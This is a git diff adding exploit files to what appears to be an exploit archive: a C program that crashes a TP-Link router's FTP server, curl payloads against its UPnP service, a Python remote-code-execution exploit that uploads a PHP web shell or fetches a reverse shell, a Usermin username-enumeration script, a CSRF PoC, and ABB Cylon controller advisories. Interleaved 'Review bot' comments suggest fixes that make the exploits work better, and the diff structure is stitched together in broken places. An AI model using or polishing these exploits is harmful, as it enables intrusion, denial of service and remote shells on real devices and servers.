diff --git a/exploits/multiple/remote/52249.c b/exploits/multiple/remote/52249.c
new file mode 100644
index 000000000..a916892ee
--- /dev/null
+++ b/exploits/multiple/remote/52249.c
@@ -0,0 +1,248 @@
+* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
+* Date: 11/24/2024
+* Exploit Author: Mohamed Maatallah
+* Vendor Homepage: https://www.tp-link.com
+* Version: TT_V6.2.1021 (VN020-F3v(T))
+* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
+* CVE: CVE-2024-12344
+* Category: Remote
+
+* Description:
+* A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:
+
+* 1. 1100 bytes - Delayed crash (5-10 seconds)
+* 2. 1450 bytes - Immediate crash
+* 3. >1450 bytes - Undefined behavior/state corruption
+
+* Proof of Concept: (attached full c file)
+ * Compilation Instructions (Visual Studio):
+ * ---------------------------------------
+ * 1. Open Visual Studio
+ * 2. Create a new C Console Application
+ * 3. Add these additional dependencies to project settings:
+ * - ws2_32.lib
+ * - iphlpapi.lib
+ * 4. Ensure Windows SDK is installed
+ * 5. Set Platform Toolset to latest v143 or v142
+ * 6. Compile in Release or Debug mode
+ *
+ * Disclaimer:
+ * ----------
+ * This proof of concept is for educational and research purposes only.
+ * Unauthorized testing without explicit permission is unethical and illegal.
+ */
+
+#define _CRT_SECURE_NO_WARNINGS
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "iphlpapi.lib")
+
+ // Target configuration - MODIFY BEFORE TESTING
+#define DEST_IP "192.168.1.1" // IP of target FTP server
+#define DEST_PORT 21 // Standard FTP port
+#define PING_TIMEOUT_MS 1000 // Network timeout
+#define MAX_PING_RETRIES 5 // Connectivity check attempts
+
+// 1450: Instant
+// 1100: Delayed
+#define CRASH_STRING_LENGTH 1450 // Exact number of 'A's triggering instantcrash
+#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2) // USER + As + \r\n
+
+typedef struct {
+ HANDLE icmp_handle;
+ IPAddr target_addr;
+ LPVOID reply_buffer;
+ DWORD reply_size;
+} ping_context_t;
+
+void log_msg(const char* prefix, const char* msg) {
+ SYSTEMTIME st;
+ GetLocalTime(&st);
+ printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
+}
+
+void hexdump(const char* desc, const void* addr, const int len) {
+ int i;
+ unsigned char buff[17];
+ const unsigned char* pc = (const unsigned char*)addr;
+
+ if (desc != NULL)
+ printf("%s:\n", desc);
+
+ for (i = 0; i < len; i++) {
+ if ((i % 16) == 0) {
+ if (i != 0)
+ printf(" %s\n", buff);
+ printf(" %04x ", i);
+ }
+
+ printf(" %02x", pc[i]);
+
+ if ((pc[i] < 0x20) || (pc[i] > 0x7e))
+ buff[i % 16] = '.';
+ else
+ buff[i % 16] = pc[i];
+ buff[(i % 16) + 1] = '\0';
+ }
+
+ while ((i % 16) != 0) {
+ printf(" ");
+ i++;
+ }
+
+ printf(" %s\n", buff);
+}
+
+BOOL check_connectivity(ping_context_t* ctx) {
+ char send_buf[32] = { 0 };
+ return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
+ NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
+}
+
+char* generate_exact_crash_payload() {
+ char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1); // +1 for null terminator
+ if (!payload) {
+ log_msg("[-]", "Failed to allocate payload memory");
+ return NULL;
+ }
+
+ // Construct the exact payload that causes crash
+ strcpy(payload, "USER "); // 5 bytes
+ memset(payload + 5, 'A', CRASH_STRING_LENGTH); // 1450 'A's
+ memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes
+ payload[TOTAL_PAYLOAD_LENGTH] = '\0';
+
+ char debug_msg[100];
+ snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
+ TOTAL_PAYLOAD_LENGTH);
+ log_msg("[*]", debug_msg);
+
+ return payload;
+}
+
+BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
+ WSADATA wsa;
+ SOCKET sock = INVALID_SOCKET;
+ struct sockaddr_in server;
+ char server_reply[2048];
+ int recv_size;
+ ping_context_t ping_ctx = { 0 };
+ BOOL success = FALSE;
+
+ // Initialize Winsock
+ if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
+ log_msg("[-]", "Winsock initialization failed");
+ return FALSE;
+ }
+
+ // Setup ICMP for connectivity monitoring
+ ping_ctx.icmp_handle = IcmpCreateFile();
+ ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
+ ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
+ inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);
+
+ // Create socket
+ sock = socket(AF_INET, SOCK_STREAM, 0);
+ if (sock == INVALID_SOCKET) {
+ log_msg("[-]", "Socket creation failed");
+ goto cleanup;
+ }
+
+ // Setup server address
+ server.sin_family = AF_INET;
+ server.sin_port = htons(target_port);
+ inet_pton(AF_INET, target_ip, &server.sin_addr);
+
+ // Connect to FTP server
+ log_msg("[*]", "Connecting to target FTP server...");
+ if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
+ log_msg("[-]", "Connection failed");
+ goto cleanup;
+ }
+ log_msg("[+]", "Connected successfully");
+
+ // Verify initial connectivity
+ if (!check_connectivity(&ping_ctx)) {
+ log_msg("[-]", "No initial connectivity to target");
+ goto cleanup;
+ }
+
+ // Receive banner
+ if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
+ log_msg("[-]", "Failed to receive banner");
+ goto cleanup;
+ }
+ server_reply[recv_size] = '\0';
+ log_msg("[*]", server_reply);
+
+ // Generate and send the exact crash payload
+ char* payload = generate_exact_crash_payload();
+ if (!payload) {
+ goto cleanup;
+ }
+
+ log_msg("[*]", "Sending crash payload...");
+ hexdump("Payload hex dump (first 32 bytes)", payload, 32);
+
+ if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
+ log_msg("[-]", "Failed to send payload");
+ free(payload);
+ goto cleanup;
+ }
+ free(payload);
+ log_msg("[+]", "Payload sent successfully");
+
+ // Monitor for crash
+ log_msg("[*]", "Monitoring target status...");
+ Sleep(1000); // Wait a bit for crash to take effect
+
+ int failed_pings = 0;
+ for (int i = 0; i < MAX_PING_RETRIES; i++) {
+ if (!check_connectivity(&ping_ctx)) {
+ failed_pings++;
+ if (failed_pings >= 3) {
+ log_msg("[+]", "Target crash confirmed!");
+ success = TRUE;
+ goto cleanup;
+ }
+ }
+ Sleep(500);
+ }
+
+ log_msg("[-]", "Target appears to still be responsive");
+
+cleanup:
+ if (sock != INVALID_SOCKET) {
+ closesocket(sock);
+ }
+ if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
+ IcmpCloseHandle(ping_ctx.icmp_handle);
+ }
+ if (ping_ctx.reply_buffer) {
+ free(ping_ctx.reply_buffer);
+ }
+ WSACleanup();
+ return success;
+}
+
+int main(void) {
+ printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
+ printf("---------------------------------------\n");
+ printf("Target: %s:%d\n", DEST_IP, DEST_PORT);
+ if (send_crash_payload(DEST_IP, DEST_PORT)) {
+ printf("\nExploit successful - target crashed\n");
+ }
+ else {
+ printf("\nExploit failed - target may be patched\n");
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/remote/52250.txt b/exploits/multiple/remote/52250.txt
new file mode 100644
index 000000000..38119d761
--- /dev/null
+++ b/exploits/multiple/remote/52250.txt
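Review bot: `send_crash_payload` does not check what `IcmpCreateFile()`, `malloc(ping_ctx.reply_size)` or the first `inet_pton()` return, so `check_connectivity` can run with an invalid ICMP handle, a NULL reply buffer or an unset `target_addr`, and any of those setup failures is then reported as "No initial connectivity to target". A guard right after the ICMP setup, replacing the unchecked `inet_pton` call, keeps the two cases apart: `if (ping_ctx.icmp_handle == INVALID_HANDLE_VALUE || ping_ctx.reply_buffer == NULL || inet_pton(AF_INET, target_ip, &ping_ctx.target_addr) != 1) { log_msg("[-]", "ICMP setup failed"); goto cleanup; }`. Separately, `hexdump` prints `buff` before anything has been stored in it when `len` is 0, so it should be declared as `unsigned char buff[17] = { 0 };`. The eight `#include` directives appear without a header name in this rendering, which looks like an artifact of the capture rather than of the committed file.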
@@ -0,0 +1,43 @@
+# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
+# Date: 10/22/2024
+# Exploit Author: Mohamed Maatallah
+# Vendor Homepage: https://www.tp-link.com
+# Version: TT_V6.2.1021 (VN020-F3v(T))
+# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
+# CVE: CVE-2024-12342
+
+
+Description:
+Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
+UPnP implementation, affecting the WANIPConnection service. The
+vulnerabilities allow unauthenticated attackers to cause denial of service
+and potential memory corruption through malformed SOAP requests.
+
+Proof of Concept 1 (Missing Parameters DoS):
+
+curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
+-H "Content-Type: text/xml" \
+-H "SOAPAction:
+\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
+-d '
+
+
+hello
+'
+
+Proof of Concept 2 (Memory Corruption):
+
+curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
+ -H "Content-Type: text/xml" \
+ -H "SOAPAction:
+\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
+ -d '
+
+
+
+ '"$(perl -e 'print "%x" x +10000;')"'
+
+
+'
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52253.py b/exploits/multiple/webapps/52253.py
new file mode 100755
index 000000000..ccb0f17ca
--- /dev/null
+++ b/exploits/multiple/webapps/52253.py
@@ -0,0 +1,180 @@
+# Exploit Title: Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)
+# Date: 10 October 2024
+# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
+# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
+# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
+# Software Link: https://github.com/adonespitogo/angular-base64-upload
+# Version: prior to v0.1.21
+# Tested on: Arch Linux
+# CVE : CVE-2024-42640
+# Severity: Critical - 10.0 (CVSS 4.0)
+# Github Link : https://github.com/rvizx/CVE-2024-42640
+# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
+
+import re
+import subprocess
+import requests
+import sys
+import os
+import uuid
+import base64
+import cmd
+from urllib.parse import urlparse
+
+
+def banner():
+ print('''
+
+ \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
+ \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
+ https://github.com/rvizx/\033[0mCVE-2024-42640
+
+''')
+
+
+def check_version(target):
+ response = requests.get(target)
+ first_line = response.text.splitlines()[0].strip()
+ match = re.search(r'v0\.(1|0)\.(\d+)', first_line)
+
+ if match:
+ version = match.group(0)
+ x_value = int(match.group(1))
+ if x_value <= 20:
+ print(f"\033[94m[inf]:\033[0m target is using a vulnerable version. [version]: {version}")
+ else:
+ print(f"\033[91m[err]:\033[0m target is not vulnerable [version]: {version}")
+ exit()
+ else:
+ print("\033[91m[err]:\033[0m couldn't find the version")
+
+
+def enum(url):
+ print("\033[94m[inf]:\033[0m enumerating... ")
+ target = f"{url}/bower_components/angular-base64-upload/dist/angular-base64-upload.min.js"
+ r = requests.head(target)
+ if r.status_code == 200:
+ print("\033[94m[inf]:\033[0m target is using bower_components")
+ check_version(target)
+ else:
+ print("\033[94m[inf]:\033[0m target is not using bower_components")
+ target = f"{url}/node_modules/angular-base64-upload/dist/angular-base64-upload.min.js"
+ r = requests.head(target)
+ if r.status_code == 200:
+ print("\033[94m[inf]:\033[0m target is using node_modules")
+ check_version(target)
+ else:
+ print("\033[94m[inf]:\033[0m target is not using node_modules")
+ print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for dist/angular-base64-upload.min.js")
+ print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
+ print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
+ print("\033[91m[err]:\033[0m exiting..")
+ exit()
+ exploit(target)
+
+
+class CmdShell(cmd.Cmd):
+ username = subprocess.check_output("whoami", shell=True).strip().decode()
+ domain = urlparse(sys.argv[1]).netloc
+ prompt = f"{username}@{domain} > "
+
+ def __init__(self, payload_url):
+ super().__init__()
+ self.payload_url = payload_url
+
+ def default(self, line):
+ url = f"{self.payload_url}?cmd={line}"
+ try:
+ response = requests.get(url)
+ print(response.text)
+ except requests.RequestException as e:
+ print("\033[91m[err]:\033[0m {e}")
+
+ def do_exit(self, arg):
+ return True
+
+def exploit(target):
+ print(f"[dbg]: {target}")
+ target_server_url = target.replace("dist/angular-base64-upload.min.js","demo/server.php")
+ print(f"[dbg]: {target_server_url}")
+ payload_name = str(uuid.uuid4())+".php"
+ if len(sys.argv) > 2:
+ if sys.argv[2] == "--rev":
+ revshell = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
+ print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
+ ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
+ port = input("\033[93m[ins]:\033[0m enter listenter port: ")
+ print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
+ input("\033[93m[ins]:\033[0m press enter to continue...")
+ print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
+ response = requests.get(revshell)
+ if response.status_code == 200:
+ payload = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
+ with open(payload_name, "w") as file:
+ file.write(payload)
+ payload_url = upload_to_server(payload_name,target_server_url)
+ print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
+ r = requests.get(payload_url)
+ if r.status_code == 200:
+ print("\033[94m[inf]:\033[0m process complete!")
+ else:
+ print("\033[91m[err]:\033[0m something went wrong!")
+ print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
+ else:
+ print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
+ print("\033[91m[err]:\033[0m exiting..")
+ exit()
+
+ else:
+ payload = ""
+ with open(payload_name, "w") as file:
+ file.write(payload)
+ payload_url = upload_to_server(payload_name,target_server_url)
+ cmd_shell = CmdShell(payload_url)
+ cmd_shell.cmdloop()
+
+def upload_to_server(payload_name,target_server_url):
+ try:
+ with open(payload_name, 'rb') as file:
+ file_content = file.read()
+ base64_payload = base64.b64encode(file_content).decode('utf-8')
+
+ headers = {
+ 'Content-Type': 'application/json',
+ }
+
+ json_data = {
+ 'base64': base64_payload,
+ 'filename': payload_name,
+ }
+
+ response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
+ print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
+ updemo_endpoint = f"uploads/{payload_name}"
+ print(f"[dbg]: {updemo_endpoint}")
+ payload_url = target_server_url.replace("server.php",updemo_endpoint)
+ print(f"[dbg]: {payload_url}")
+ if response.status_code == 200:
+ print(f"\033[94m[inf]:\033[0m payload is uploaded to {payload_url}")
+ return payload_url
+ else:
+ print("\033[91m[err]:\033[0m something went wrong! failed to upload the payload to server")
+ exit()
+ except Exception as e:
+ print(f"\033[91m[err]:\033[0m {e}")
+ exit()
+
+if __name__ == "__main__":
+ try:
+ banner()
+ if len(sys.argv) > 1:
+ url = sys.argv[1]
+ print(f"\033[94m[inf]:\033[0m target: {url}")
+ enum(url)
+ else:
+ print("[usg]: ./exploit.py ")
+ print("[usg]: ./exploit.py --rev")
+ exit()
+ except Exception as e:
+ print(f"\033[91m[err]:\033[0m {e}")
+ exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52254.py b/exploits/multiple/webapps/52254.py
new file mode 100755
index 000000000..f03e5b3a5
--- /dev/null
+++ b/exploits/multiple/webapps/52254.py
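Review bot: `CmdShell` evaluates `urlparse(sys.argv[1]).netloc` and a `shell=True` `whoami` in its class body, so both run at import time, before `banner()` and the argument check under `__main__`; invoking the script with no arguments therefore dies with an `IndexError` traceback instead of printing the usage lines. Building the prompt in `__init__` from the URL it already receives removes both the ordering problem and the subprocess: `self.prompt = f"{getpass.getuser()}@{urlparse(payload_url).netloc} > "` (with `import getpass`). In `check_version`, `x_value = int(match.group(1))` reads the middle component of `v0\.(1|0)\.(\d+)`, which is always 0 or 1, so `x_value <= 20` can never take the "not vulnerable" branch; `match.group(2)` is the component the comparison intends. The message in `CmdShell.default` is also missing its `f` prefix, so `{e}` is printed literally.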
@@ -0,0 +1,54 @@
+# Exploit Title: Usermin 2.100 - Username Enumeration
+# Date: 10.02.2024
+# Exploit Author: Kjesper
+# Vendor Homepage: https://www.webmin.com/usermin.html
+# Software Link: https://github.com/webmin/usermin
+# Version: <= 2.100
+# Tested on: Kali Linux
+# CVE: CVE-2024-44762
+# https://senscybersecurity.nl/cve-2024-44762-explained/
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# Usermin - Username Enumeration (Version 2.100)
+# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
+# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
+
+import requests
+import json
+import requests
+import argparse
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
+parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
+
+args = parser.parse_args()
+
+if len(sys.argv) != 5:
+ print("Please provide the -u for URL and -w for the wordlist containing the usernames")
+ print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
+ exit()
+
+usernameFile = open(args.wordlist_users, 'r')
+
+dataUsername = usernameFile.read()
+usernameFileIntoList = dataUsername.split("\n")
+usernameFile.close()
+
+for i in usernameFileIntoList:
+
+ newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
+ params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
+ response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
+ if "Failed to change password: The current password is incorrect." in response.text:
+ print("Possible user found with username: " + i)
+
+ if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
+ print("Application is most likely not vulnerable and are therefore quitting.")
+ exit() # comment out line 33-35 if you would still like to try username enumeration.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52256.txt b/exploits/multiple/webapps/52256.txt
new file mode 100644
index 000000000..344daac4a
--- /dev/null
+++ b/exploits/multiple/webapps/52256.txt
@@ -0,0 +1,43 @@
+#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
+Input Validation
+# Google Dork: N/A
+# Date: 2024-12-26
+# Exploit Author: Kwangyun Keum
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
+# Version: 2.4
+# Tested on: Windows 10 / Kali Linux with Apache and MySQL
+# CVE: CVE-2024-12955
+
+## Description:
+Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
+Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
+functionalities such as logout. An attacker can craft a malicious iframe
+embedding the logout URL and trick a victim into clicking it. This results
+in the victim being logged out without their consent.
+
+## Steps to Reproduce:
+1. Deploy Blood Bank & Donor Management System v2.4.
+2. Log in as any user.
+3. Use the following PoC to demonstrate the issue:
+
+ ```html
+
+
+
+
+
+4. Save the above HTML code as logout_poc.html.
+5.Open the file in a browser and click anywhere on the page to trigger the
+logout.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52257.txt b/exploits/multiple/webapps/52257.txt
new file mode 100644
index 000000000..b483631e2
--- /dev/null
+++ b/exploits/multiple/webapps/52257.txt
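Review bot: The wordlist loop in 52254.py sends a request with an empty `user` value whenever the file ends in a newline, because `dataUsername.split("\n")` keeps the trailing empty string; `usernameFileIntoList = dataUsername.splitlines()` together with `if not i: continue` at the top of the loop avoids that. The manual `len(sys.argv) != 5` check duplicates what argparse already provides — `required=True` on both `add_argument` calls yields the usage message and exit code without the extra block. Smaller points in the same hunk: `requests` is imported twice, `json` is imported but never used, and the wordlist is opened without `with`. The trailing comment refers to "line 33-35", which in this file is the argument-count check rather than the `exit()` block the comment sits on.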
@@ -0,0 +1,26 @@
+# Exploit Title: compop.ca 3.5.3 - Arbitrary code Execution
+# Google Dork: Terms of Use inurl:compop.vip
+# Date: 22/12/2024
+# Exploit Author: dmlino
+# Vendor Homepage: https://www.compop.ca/
+# Version: 3.5.3
+# CVE : CVE-2024-48445
+
+
+The restaurant management system implements authentication using a Unix
+timestamp parameter ("ts") in the URL. This implementation is vulnerable to
+manipulation as it relies solely on time-based validation without proper
+authentication mechanisms.
+
+Technical Details:
+The application uses a URL parameter "ts" which accepts a Unix timestamp
+value.
+
+Steps:
+1. Find a vulnerable restaurant.
+
+2. Get the current time in the UNIX format:
+ Linux: $date +%s
+ Windows Powershell: [int](Get-Date -UFormat %s -Millisecond 0)
+
+3. Replace parameter in url with the new value
\ No newline at end of file
diff --git a/exploits/php/hardware/52251.txt b/exploits/php/hardware/52251.txt
new file mode 100644
index 000000000..953978b87
--- /dev/null
+++ b/exploits/php/hardware/52251.txt
@@ -0,0 +1,79 @@
+# Exploit Title: ABB Cylon Aspect 3.08.02 (deployStart.php) Unauthenticated Command Execution
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+ Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
+shell command execution vulnerability through the deployStart.php script.
+This allows any user to trigger the execution of 'rundeploy.sh' script, which
+initializes the Java deployment server that sets various configurations,
+potentially causing unauthorized server initialization and performance issues.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+ GNU/Linux 3.10.0 (x86_64)
+ GNU/Linux 2.6.32 (x86_64)
+ Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+ Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+ PHP/7.3.11
+ PHP/5.6.30
+ PHP/5.4.16
+ PHP/4.4.8
+ PHP/5.3.3
+ AspectFT Automation Application Server
+ lighttpd/1.4.32
+ lighttpd/1.4.18
+ Apache/2.2.15 (CentOS)
+ OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+ OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2024-5891
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5891.php
+CVE ID: CVE-2024-48840
+CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48840
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/deployStart.php
\ No newline at end of file
diff --git a/exploits/php/hardware/52252.txt b/exploits/php/hardware/52252.txt
new file mode 100644
index 000000000..0eb3f0517
--- /dev/null
+++ b/exploits/php/hardware/52252.txt
@@ -0,0 +1,135 @@
+# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+ Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon controller suffers from an authenticated path traversal
+vulnerability. This can be exploited through the 'devName' POST parameter in
+the ethernetUpdate.php script to write partially controlled content, such as
+IP address values, into arbitrary file paths, potentially leading to configuration
+tampering and system compromise including denial of service scenario through
+ethernet configuration backup file overwrite.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+ GNU/Linux 3.10.0 (x86_64)
+ GNU/Linux 2.6.32 (x86_64)
+ Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+ Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+ PHP/7.3.11
+ PHP/5.6.30
+ PHP/5.4.16
+ PHP/4.4.8
+ PHP/5.3.3
+ AspectFT Automation Application Server
+ lighttpd/1.4.32
+ lighttpd/1.4.18
+ Apache/2.2.15 (CentOS)
+ OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+ OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2024-5890
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
